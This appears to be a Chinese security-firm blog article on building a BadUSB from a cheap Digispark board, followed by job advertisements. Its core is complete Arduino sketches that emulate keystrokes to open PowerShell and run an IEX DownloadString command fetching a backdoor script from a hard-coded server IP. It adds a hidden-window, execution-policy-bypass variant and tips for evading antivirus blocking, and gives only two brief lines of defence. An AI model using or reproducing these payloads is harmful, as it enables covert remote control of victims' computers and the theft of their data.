STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
NO.1 简介
通过硬件直接插入对方电脑,让对方电脑执行代码,达到干扰、控制主机或者窃取信息等目的。
NO.2 威胁
BadUSB的威胁在于:恶意代码存在于U盘的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB的攻击。
digispark,某宝只需要9元,最迷你的一个开发板,非常适合测试使用,实战中需要稍微改装,原因是它插入到电脑上的时候会闪红灯,非常的容易让人引起注意。
整体思路在上一篇文章《BadUSB的制作(Leonardo篇)》中有提到过,我们就是通过让电脑执行命令,从而造成远控。同样在服务器上放置我们的后门文件,然后构造命令语句去下载执行我们服务器上的后门文件,造成远控。
然后我们开始使用Arduino
http://www.arduino.cn/thread-5838-1-1.html
工具——开发板——开发板管理器选择digispark开发板。
但是我们会发现默认开发板下载栏里面没有digispark。于是需要我们手动去添加。
文件——首选项里面添加开发模板管理器地址
这边提供了usbninja和digispark的接口地址
http://usbninja.com/arduino/package_USBNinja_index.json
https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json
但是网上关于digispark接口的链接都失效了,万般搜索终于找到了接口文件
{"packages":[{"name":"digistump","maintainer":"Digistump","websiteURL":"http://digistump.com","email":"[email protected]","help":{"online":"https://digistump.com/board"},"platforms":[{"name": "Digistump AVR Boards","architecture": "avr","version": "1.6.7","category": "Digistump","url": "https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/digistump-avr-1.6.7.zip","archiveFileName": "digistump-avr-1.6.7.zip","checksum": "SHA-256:7F7E9F5AB982163F7A792C411326F0192A35B8A90890B7934F2F424A5426583D","size": "2491070","help": {"online": "https://github.com/digistump/DigistumpArduino/issues"},"boards": [{"name": "Digispark (Default - 16.5mhz)"},{"name": "Digispark Pro (Default 16 Mhz)"},{"name": "Digispark Pro (16 Mhz) (32 byte buffer)"},{"name": "Digispark Pro (16 Mhz) (64 byte buffer)"},{"name": "Digispark (16mhz - No USB)"},{"name": "Digispark (8mhz - No USB)"},{"name": "Digispark (1mhz - No USB)"}],"toolsDependencies": [{"packager": "arduino","name": "avr-gcc","version": "4.8.1-arduino5"},{"packager": "digistump","name": "micronucleus","version": "2.0a4"}]},{"name": "Digistump SAM Boards (32-bits ARM Cortex-M3)","architecture": "sam","version": "1.6.7","category": "Digistump","url": "https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/digistump-sam-1.6.7.zip","archiveFileName": "digistump-sam-1.6.7.zip","checksum": "SHA-256:C091CA9372220E18394AD7876A919201705BB281167309A2571270E374DB2698","size": "21937559","help": {"online": "https://github.com/digistump/DigistumpArduino/issues"},"boards": [{"name": "Digistump DigiX"}],"toolsDependencies": [{"packager": "digistump","name": "micronucleus","version": "2.0a4"},{"packager": "digistump","name": "arm-none-eabi-gcc","version": "4.8.3-2014q1"},{"packager": "digistump","name": "bossac","version": "1.3a-arduino"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.0","category": "Digistump","url": "https://github.com/digistump/OakCore/releases/download/1.0.0/core-1.0.0.zip","archiveFileName": "core-1.0.0.zip","checksum": "SHA-256:631C214AA1D6CD01794A47D53541433CE5AEE59159627A559E4293F78B3B8E45","size": "6879430","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.0"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.1","category": "Digistump","url": "https://github.com/digistump/OakCore/releases/download/1.0.1/core-1.0.1.zip","archiveFileName": "core-1.0.1.zip","checksum": "SHA-256:64A3EE39C91AB6BD7BE05685405F7D45A70A2B0E227B4DF930E9D8623B83CF39","size": "6881865","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (Pin 1 Safe Mode - Manual Config Only)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.1"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.2","category": "Digistump","url": "https://github.com/digistump/OakCore/releases/download/1.0.2/core-1.0.2.zip","archiveFileName": "core-1.0.2.zip","checksum": "SHA-256:988EEC1A3E4B97A0F31332F4A8FF7AB0E30515EB5DAC22D96DB3B0130213DAF8","size": "6945915","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (Pin 1 Safe Mode - Manual Config Only)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.2"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.3","category": "Digistump","url": "https://github.com/digistump/OakCore/releases/download/1.0.3/core-1.0.3.zip","archiveFileName": "core-1.0.3.zip","checksum": "SHA-256:AD14574F6DD9085C0874DCE255038F3C0C9F5417221F960ECD80E17E5AF063BE","size": "6947972","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (Pin 1 Safe Mode - Manual Config Only)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.2"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.4","category": "Digistump","url": "https://github.com/digistump/OakCore/releases/download/1.0.4/core-1.0.4.zip","archiveFileName": "core-1.0.4.zip","checksum": "SHA-256:2ABFE8ABB54223032E3B3B852A869D2518AD4BBDC7119942D45B108A04F877EB","size": "6947979","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (Pin 1 Safe Mode - Manual Config Only)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.2"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.5","category": "Digistump","url": "https://github.com/digistump/OakCore/releases/download/1.0.5/core-1.0.5.zip","archiveFileName": "core-1.0.5.zip","checksum": "SHA-256:93FC1BFCC56DCCF7B6858DBB81F7B22D5C252B444947F57CCB898C62CE3AE96D","size": "6947985","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (Pin 1 Safe Mode - Manual Config Only)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.2"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]},{"name": "Oak by Digistump","architecture": "oak","version": "1.0.6","category": "Digistump","url": "https://github.com/digistump/OakCore/archive/1.0.6.zip","archiveFileName": "1.0.6.zip","checksum": "SHA-256:47071BB74FEEBA7F4BE7623684F3E5AB06F19F7476B00F9C1CFA6ADA45084797","size": "6861729","help": {"online": "http://digistump.com/wiki/oak"},"boards": [{"name": "Oak by Digistump (Pin 1 Safe Mode - Default)"},{"name": "Oak by Digistump (Pin 1 Safe Mode - Manual Config Only)"},{"name": "Oak by Digistump (No Safe Mode - ADVANCED ONLY)"}],"toolsDependencies": [{"packager": "digistump","name": "oakcli","version": "1.0.2"},{"packager": "digistump","name": "esptool2","version": "0.9.1"},{"packager": "digistump","version": "1.20.0-26-gb404fb9-2","name": "xtensa-lx106-elf-gcc"},{"packager": "digistump","version": "0.1.2","name": "mkspiffs"}]}],"tools":[{"name": "micronucleus","version": "2.0a4","systems": [{"host": "x86_64-apple-darwin","archiveFileName": "micronucleus-2.0a4-osx.tar.gz","url": "https://github.com/digistump/DigistumpArduino/releases/download/1.6.5a/micronucleus-2.0a4-osx.tar.gz","checksum": "SHA-256:B5EB0C7B251CD88F4816186BB931855834141E71A28D90FB9E46788E483AA421","size": "51203"},{"host": "i686-mingw32","archiveFileName": "micronucleus-2.0a4-win.zip","url": "https://github.com/digistump/DigistumpArduino/releases/download/1.6.5a/micronucleus-2.0a4-win.zip","checksum": "SHA-256:7027971118FDE88484AACB5D8CA7867D66E273839EC3B2592616829317BB70E4","size": "1712005"},{"host": "i686-linux-gnu","archiveFileName": "micronucleus-2.0a4-linux32.tar.gz","url": "https://github.com/digistump/DigistumpArduino/releases/download/1.6.5a/micronucleus-2.0a4-linux32.tar.gz","checksum": "SHA-256:0D4286388EED28D1ECB29AFE81253F24F54D4F0A5C1B2C17507EABD504C595F8","size": "21909"},{"host": "x86_64-linux-gnu","archiveFileName": "micronucleus-2.0a4-linux64.tar.gz","url": "https://github.com/digistump/DigistumpArduino/releases/download/1.6.5a/micronucleus-2.0a4-linux64.tar.gz","checksum": "SHA-256:1F545C0BB60E85A604901C2D7044772AC91776594C209C571DFEDAD4A70195B8","size": "22874"}]},{"name": "arm-none-eabi-gcc","version": "4.8.3-2014q1","systems": [{"host": "i686-mingw32","archiveFileName": "gcc-arm-none-eabi-4.8.3-2014q1-windows.tar.gz","url": "http://downloads.arduino.cc/gcc-arm-none-eabi-4.8.3-2014q1-windows.tar.gz","checksum": "SHA-256:fd8c111c861144f932728e00abd3f7d1107e186eb9cd6083a54c7236ea78b7c2","size": "84537449"},{"host": "x86_64-apple-darwin","url": "http://downloads.arduino.cc/gcc-arm-none-eabi-4.8.3-2014q1-mac.tar.gz","archiveFileName": "gcc-arm-none-eabi-4.8.3-2014q1-mac.tar.gz","checksum": "SHA-256:3598acf21600f17a8e4a4e8e193dc422b894dc09384759b270b2ece5facb59c2","size": "52518522"},{"host": "x86_64-pc-linux-gnu","url": "http://downloads.arduino.cc/gcc-arm-none-eabi-4.8.3-2014q1-linux64.tar.gz","archiveFileName": "gcc-arm-none-eabi-4.8.3-2014q1-linux64.tar.gz","checksum": "SHA-256:d23f6626148396d6ec42a5b4d928955a703e0757829195fa71a939e5b86eecf6","size": "51395093"},{"host": "i686-pc-linux-gnu","url": "http://downloads.arduino.cc/gcc-arm-none-eabi-4.8.3-2014q1-linux32.tar.gz","archiveFileName": "gcc-arm-none-eabi-4.8.3-2014q1-linux32.tar.gz","checksum": "SHA-256:ba1994235f69c526c564f65343f22ddbc9822b2ea8c5ee07dd79d89f6ace2498","size": "51029223"}]},{"name": "bossac","version": "1.3a-arduino","systems": [{"host": "i686-linux-gnu","url": "http://downloads.arduino.cc/tools/bossac-1.3a-arduino-i686-linux-gnu.tar.bz2","archiveFileName": "bossac-1.3a-arduino-i686-linux-gnu.tar.bz2","checksum": "SHA-256:d6d10362f40729a7877e43474fcf02ad82cf83321cc64ca931f5c82b2d25d24f","size": "147359"},{"host": "x86_64-pc-linux-gnu","url": "http://downloads.arduino.cc/tools/bossac-1.3a-arduino-x86_64-pc-linux-gnu.tar.bz2","archiveFileName": "bossac-1.3a-arduino-x86_64-pc-linux-gnu.tar.bz2","checksum": "SHA-256:c1daed033251296768fa8b63ad283e053da93427c0f3cd476a71a9188e18442c","size": "26179"},{"host": "i686-mingw32","url": "http://downloads.arduino.cc/tools/bossac-1.3a-arduino-i686-mingw32.tar.bz2","archiveFileName": "bossac-1.3a-arduino-i686-mingw32.tar.bz2","checksum": "SHA-256:a37727622e0f86cb4f2856ad0209568a5d804234dba3dc0778829730d61a5ec7","size": "265647"},{"host": "i386-apple-darwin11","url": "http://downloads.arduino.cc/tools/bossac-1.3a-arduino-i386-apple-darwin11.tar.bz2","archiveFileName": "bossac-1.3a-arduino-i386-apple-darwin11.tar.bz2","checksum": "SHA-256:40770b225753e7a52bb165e8f37e6b760364f5c5e96048168d0178945bd96ad6","size": "39475"}]},{"name": "oakcli","version": "1.0.2","systems": [{"host": "i686-linux-gnu","url": "https://github.com/digistump/OakCLI/releases/download/1.0.2/oakcli-1.0.2-linux32.tar.gz","archiveFileName": "oakcli-1.0.2-linux32.tar.gz","checksum": "SHA-256:C59996CC95614BA4041CFB1CC0F34F3064CA6FCF6887970A6D5E61A5B100ED71","size": "5684530"},{"host": "x86_64-pc-linux-gnu","url": "https://github.com/digistump/OakCLI/releases/download/1.0.2/oakcli-1.0.2-linux64.tar.gz","archiveFileName": "oakcli-1.0.2-linux64.tar.gz","checksum": "SHA-256:269774B42F87D1E2F3E197FD40B87971AF4ACA91DDFDA427234AEAA3DF137284","size": "5899396"},{"host": "i686-mingw32","url": "https://github.com/digistump/OakCLI/releases/download/1.0.2/oakcli-1.0.2-win32.zip","archiveFileName": "oakcli-1.0.2-win32.zip","checksum": "SHA-256:82192B93736771F804EF30258E9A806F0B0A6B02C3ED6F11356E169C08948D66","size": "3230824"},{"host": "i386-apple-darwin11","url": "https://github.com/digistump/OakCLI/releases/download/1.0.2/oakcli-1.0.2-osx.tar.gz","archiveFileName": "oakcli-1.0.2-osx.tar.gz","checksum": "SHA-256:A4992CFAC828D23830F3C24FE52FD678E553FB17C7C8B9232DC39CFF06E6C3B4","size": "4562442"}]},{"name": "oakcli","version": "1.0.1","systems": [{"host": "i686-linux-gnu","url": "https://github.com/digistump/OakCLI/releases/download/1.0.1/oakcli-1.0.1-linux32.tar.gz","archiveFileName": "oakcli-1.0.1-linux32.tar.gz","checksum": "SHA-256:4050FBF159A4473E69DF9949236855E8EAD28D4379122DFD608E3F0AB2BAA13D","size": "5688406"},{"host": "x86_64-pc-linux-gnu","url": "https://github.com/digistump/OakCLI/releases/download/1.0.1/oakcli-1.0.1-linux64.tar.gz","archiveFileName": "oakcli-1.0.1-linux64.tar.gz","checksum": "SHA-256:575256152F5F6483E34A42F900E3EC1FF2A779578C94A03001EBC746013E1B4B","size": "5905476"},{"host": "i686-mingw32","url": "https://github.com/digistump/OakCLI/releases/download/1.0.1/oakcli-1.0.1-win32.zip","archiveFileName": "oakcli-1.0.1-win32.zip","checksum": "SHA-256:82CEA3AC89CC604F65141C27B08E2CD0574CF24786FBB5584B042ECCEE54852B","size": "3234116"},{"host": "i386-apple-darwin11","url": "https://github.com/digistump/OakCLI/releases/download/1.0.1/oakcli-1.0.1-osx.tar.gz","archiveFileName": "oakcli-1.0.1-osx.tar.gz","checksum": "SHA-256:6564B415AF1235A9A68ED1AC0AA5342997057250B12CAFB1CE8DD9BFE4F587D9","size": "4565595"}]},{"name": "oakcli","version": "1.0.0","systems": [{"host": "i686-linux-gnu","url": "https://github.com/digistump/OakCLI/releases/download/1.0.0/oakcli-1.0.0-linux32.tar.gz","archiveFileName": "oakcli-1.0.0-linux32.tar.gz","checksum": "SHA-256:234336092B287531E8143CAA06232F582424B49C193F19B1C7F0D85186F29ABB","size": "5688186"},{"host": "x86_64-pc-linux-gnu","url": "https://github.com/digistump/OakCLI/releases/download/1.0.0/oakcli-1.0.0-linux64.tar.gz","archiveFileName": "oakcli-1.0.0-linux64.tar.gz","checksum": "SHA-256:236F3F0A8CA77CDD7F58708A6292F9295E0B89EA33930FF6C108860EF68BD55B","size": "5905721"},{"host": "i686-mingw32","url": "https://github.com/digistump/OakCLI/releases/download/1.0.0/oakcli-1.0.0-win32.zip","archiveFileName": "oakcli-1.0.0-win32.zip","checksum": "SHA-256:07D57550C7CF225D3CF6CC2CBA4089DA75FB79F9F7DA5CF41F0C882B89EA0DE9","size": "3233023"},{"host": "i386-apple-darwin11","url": "https://github.com/digistump/OakCLI/releases/download/1.0.0/oakcli-1.0.0-osx.tar.gz","archiveFileName": "oakcli-1.0.0-osx.tar.gz","checksum": "SHA-256:6685772356743F7ABFEB516D25A8C62B427EA0AFDE2402BE39C09D0D0AF33B67","size": "4561638"}]},{"name": "esptool2","version": "0.9.1","systems": [{"host": "i686-linux-gnu","url": "https://github.com/digistump/OakCore/releases/download/0.9.2/esptool2-0.9.1-linux32.tar.gz","archiveFileName": "esptool2-0.9.1-linux32.tar.gz","checksum": "SHA-256:DEA66398D035E44BA9D29473EABADB055A304E4FCA2C7C5F90CE31EDA114AED6","size": "8577"},{"host": "x86_64-pc-linux-gnu","url": "https://github.com/digistump/OakCore/releases/download/0.9.2/esptool2-0.9.1-linux64.tar.gz","archiveFileName": "esptool2-0.9.1-linux64.tar.gz","checksum": "SHA-256:6D54579A5B2C7F9910916A1F22C87589E4563B7FC49A176EAA7A57918A81CB2B","size": "8667"},{"host": "i686-mingw32","url": "https://github.com/digistump/OakCore/releases/download/0.9.2/esptool2-0.9.1-win32.zip","archiveFileName": "esptool2-0.9.1-win32.zip","checksum": "SHA-256:648772172E9895FA12502EF0152EFA1176775949CE9AF8E5E0D989BA774C2E14","size": "7859"},{"host": "i386-apple-darwin11","url": "https://github.com/digistump/OakCore/releases/download/0.9.2/esptool2-0.9.1-osx.tar.gz","archiveFileName": "esptool2-0.9.1-osx.tar.gz","checksum": "SHA-256:A30EAF00102DF2BE9DEF9CDC0320F116C6A3629069917C9537A37871ADC09AC1","size": "6746"}]},{"name": "xtensa-lx106-elf-gcc","version": "1.20.0-26-gb404fb9-2","systems": [{"host": "i686-mingw32","url": "http://arduino.esp8266.com/win32-xtensa-lx106-elf-gb404fb9-2.tar.gz","archiveFileName": "win32-xtensa-lx106-elf-gb404fb9-2.tar.gz","checksum": "SHA-256:10476b9c11a7a90f40883413ddfb409f505b20692e316c4e597c4c175b4be09c","size": "153527527"},{"host": "x86_64-apple-darwin","url": "http://arduino.esp8266.com/osx-xtensa-lx106-elf-gb404fb9-2.tar.gz","archiveFileName": "osx-xtensa-lx106-elf-gb404fb9-2.tar.gz","checksum": "SHA-256:0cf150193997bd1355e0f49d3d49711730035257bc1aee1eaaad619e56b9e4e6","size": "35385382"},{"host": "i386-apple-darwin","url": "http://arduino.esp8266.com/osx-xtensa-lx106-elf-gb404fb9-2.tar.gz","archiveFileName": "osx-xtensa-lx106-elf-gb404fb9-2.tar.gz","checksum": "SHA-256:0cf150193997bd1355e0f49d3d49711730035257bc1aee1eaaad619e56b9e4e6","size": "35385382"},{"host": "x86_64-pc-linux-gnu","url": "http://arduino.esp8266.com/linux64-xtensa-lx106-elf-gb404fb9.tar.gz","archiveFileName": "linux64-xtensa-lx106-elf-gb404fb9.tar.gz","checksum": "SHA-256:46f057fbd8b320889a26167daf325038912096d09940b2a95489db92431473b7","size": "30262903"},{"host": "i686-pc-linux-gnu","url": "http://arduino.esp8266.com/linux32-xtensa-lx106-elf.tar.gz","archiveFileName": "linux32-xtensa-lx106-elf.tar.gz","checksum": "SHA-256:b24817819f0078fb05895a640e806e0aca9aa96b47b80d2390ac8e2d9ddc955a","size": "32734156"}]},{"name": "mkspiffs","version": "0.1.2","systems": [{"host": "i686-mingw32","url": "https://github.com/igrr/mkspiffs/releases/download/0.1.2/mkspiffs-0.1.2-windows.zip","archiveFileName": "mkspiffs-0.1.2-windows.zip","checksum": "SHA-256:0a29119b8458b61a877408f7995e4944623a712e0d313a2c2f76af9ab55cc9f2","size": "230802"},{"host": "x86_64-apple-darwin","url": "https://github.com/igrr/mkspiffs/releases/download/0.1.2/mkspiffs-0.1.2-osx.tar.gz","archiveFileName": "mkspiffs-0.1.2-osx.tar.gz","checksum": "SHA-256:df656fae21a41c1269ea50cb53752dcaf6a4e1437255f3a9fb50b4025549b58e","size": "115091"},{"host": "i386-apple-darwin","url": "https://github.com/igrr/mkspiffs/releases/download/0.1.2/mkspiffs-0.1.2-osx.tar.gz","archiveFileName": "mkspiffs-0.1.2-osx.tar.gz","checksum": "SHA-256:df656fae21a41c1269ea50cb53752dcaf6a4e1437255f3a9fb50b4025549b58e","size": "115091"},{"host": "x86_64-pc-linux-gnu","url": "https://github.com/igrr/mkspiffs/releases/download/0.1.2/mkspiffs-0.1.2-linux64.tar.gz","archiveFileName": "mkspiffs-0.1.2-linux64.tar.gz","checksum": "SHA-256:1a1dd81b51daf74c382db71b42251757ca4136e8762107e69feaa8617bac315f","size": "46281"},{"host": "i686-pc-linux-gnu","url": "https://github.com/igrr/mkspiffs/releases/download/0.1.2/mkspiffs-0.1.2-linux32.tar.gz","archiveFileName": "mkspiffs-0.1.2-linux32.tar.gz","checksum": "SHA-256:e990d545dfcae308aabaac5fa9e1db734cc2b08167969e7eedac88bd0839667c","size": "45272"}]}]}]}
将这个保存成package_digistump_index.json,然后放置到本地,或者放置到公网。开启web服务以这种方式去添加到附加开发板管理器网址去:http://XX.XX.XX.XX/package_digistump_index.json
制作好后门之后我们就需要将代码放置到Arduino里去,然后上传,同样核心代码都是去请求并执行服务器的后门文件。
Powershell IEX(New-Object Net.WebClient).DownloadString('http://123.207.101.205:8000/sys_dll.ps1');
网上很多会利用下面这个命令去隐藏窗口,绕过拦截。
powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://服务器ip:8000/生成的后门');
我测试的时候这几行命令是怎么样都会被拦的。
于是我尝试了使用分开执行的方式,绕过了拦截。
首先window+R键打开运行窗,输入powershell
打开powershell后输入命令,发现不会被拦截。
接着我们就按分开的逻辑去写入代码。
打开arduino工具,选择digispark
DigiKeyboard.delay()用来设置延迟
DigiKeyboard.sendKeyStroke 设置按钮事件
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); 这个括号里面内容是window键加R键组合
DigiKeyboard.delay(5000); 这个是延迟5秒
然后开始写入代码:
# include "DigiKeyboard.h"# define KEY_ESC 41# define KEY_BACKSPACE 42# define KEY_TAB 43# define KEY_PRT_SCR 70# define KEY_DELETE 76void setup() {DigiKeyboard.delay(5000);DigiKeyboard.sendKeyStroke(0);DigiKeyboard.delay(3000);DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);DigiKeyboard.delay(1000);DigiKeyboard.print(F("powershellIEX(New-Object Net.WebClient).DownloadString('http://123.207.101.205:8000/cs.ps1');"));DigiKeyboard.delay(500);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.delay(750);DigiKeyboard.sendKeyStroke(KEY_ENTER);}void loop() {}
代码写好了就点击上传
出现了这个英文之后,代表1分钟内要插入usb,否则烧录失败。
成功之后会提示谢谢。
这里出现了很神奇的问题,比过绕过拦截还烦人。就是window10自带输入法。默认输入框它都会默认使用中文输入法输入,输入的内容就变成下图这样的中文。最为棘手的是iex(这个左括号一定会变成中文的括号,这样和右边的英文括号不一致(一边全角一边半角)代码就执行不了。其他usb烧录可以使用大写键,或者shift键去绕过输入法限制。但是Digispark语法里面没有大写键,shift键盘,不支持大多的单独键位设置。
这是digispark支持的单独键位,除了字母键
后发现一款工具,可以生成对应键的语法。总算是查到了存在组合键Ctrl+空格键的写法,因为除了caps_lock键和shift键只剩ctrl+空格去掉输入法。
工具下载地址:
https://github.91chifun.workers.dev//https://github.com/Catboy96/Automator/releases/download/1.0.0/Automator.exe
代码:
# include "DigiKeyboard.h"# define KEY_ESC 41# define KEY_BACKSPACE 42# define KEY_TAB 43# define KEY_PRT_SCR 70# define KEY_DELETE 76void setup() {DigiKeyboard.delay(5000);DigiKeyboard.sendKeyStroke(0);DigiKeyboard.delay(3000);DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);DigiKeyboard.delay(1000);DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_CONTROL_LEFT);DigiKeyboard.delay(1000);DigiKeyboard.print(F("powershell"));DigiKeyboard.delay(500);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.delay(750);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.print(F("IEX(New-Object Net.WebClient).DownloadString('http://服务器io:8000/后门');")DigiKeyboard.delay(500);DigiKeyboard.sendKeyStroke(KEY_ENTER);DigiKeyboard.delay(750);DigiKeyboard.sendKeyStroke(KEY_ENTER);}void loop() {}
懂得编写原理,就可以自己去思考什么姿势更骚。
NO.3 防御方案
1.使用杀毒软件。火绒等可以有效拦截落地的后门文件,defender自带策略会阻断命令执行下载文件。
2.养成良好的安全意识,电脑设置锁屏密码。当人离开pc,请务必锁屏。
征稿通知
知识应该被分享,安全更需携手共进
征稿持续进行中!愿意分享知识经验的小伙伴们可以把自己的知识沉淀稿件投稿至邮箱:
[email protected]
稿件一经发布将有丰厚的稿费!
有任何疑问请添加微信:_WOXIANGJJ 咨询哦~
RECRUITMENT
招聘启事
安恒雷神众测SRC运营(实习生) 【任职要求】
————————
【职责描述】
1. 负责SRC的微博、微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;
2. 负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;
3. 参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;
4. 积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;
5. 积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。
1. 责任心强,性格活泼,具备良好的人际交往能力;
2. 对网络安全感兴趣,对行业有基本了解;
3. 良好的文案写作能力和活动组织协调能力。
简历投递至
设计师(实习生)
————————
【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。
【职位要求】
1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;
2、有良好的美术功底,审美能力和创意,色彩感强;
3、精通photoshop/illustrator/coreldrew/等设计制作软件;
4、有品牌传播、产品设计或新媒体视觉工作经历;
【关于岗位的其他信息】
企业名称:杭州安恒信息技术股份有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上
工作年限:1年及以上,条件优秀者可放宽
简历投递至
安全招聘
————————
公司:安恒信息
岗位:Web安全 安全研究员
部门:战略支援部
薪资:13-30K
工作年限:1年+
工作地点:杭州(总部)、广州、成都、上海、北京
工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…
【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案
【岗位要求】
1.至少1年安全领域工作经验;
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例;
4.熟练掌握php、java、asp.net代码审计基础(一种或多种)
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验,熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)
【加分项】
1.具备良好的英语文档阅读能力;
2.曾参加过技术沙龙担任嘉宾进行技术分享;
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;
5.开发过安全相关的开源项目;
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;
7.个人技术博客;
8.在优质社区投稿过文章;
岗位:安全红队武器自动化工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)
【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。
【岗位要求】
1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言;
2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案;
3:熟悉域安全以及内网横向渗透、常见web等漏洞原理;
4.对安全技术有浓厚的兴趣及热情,有主观研究和学习的动力;
5.具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。
【加分项】
1.有高并发tcp服务、分布式等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。
简历投递至
岗位:红队武器化Golang开发工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)
【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。
【岗位要求】
1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;
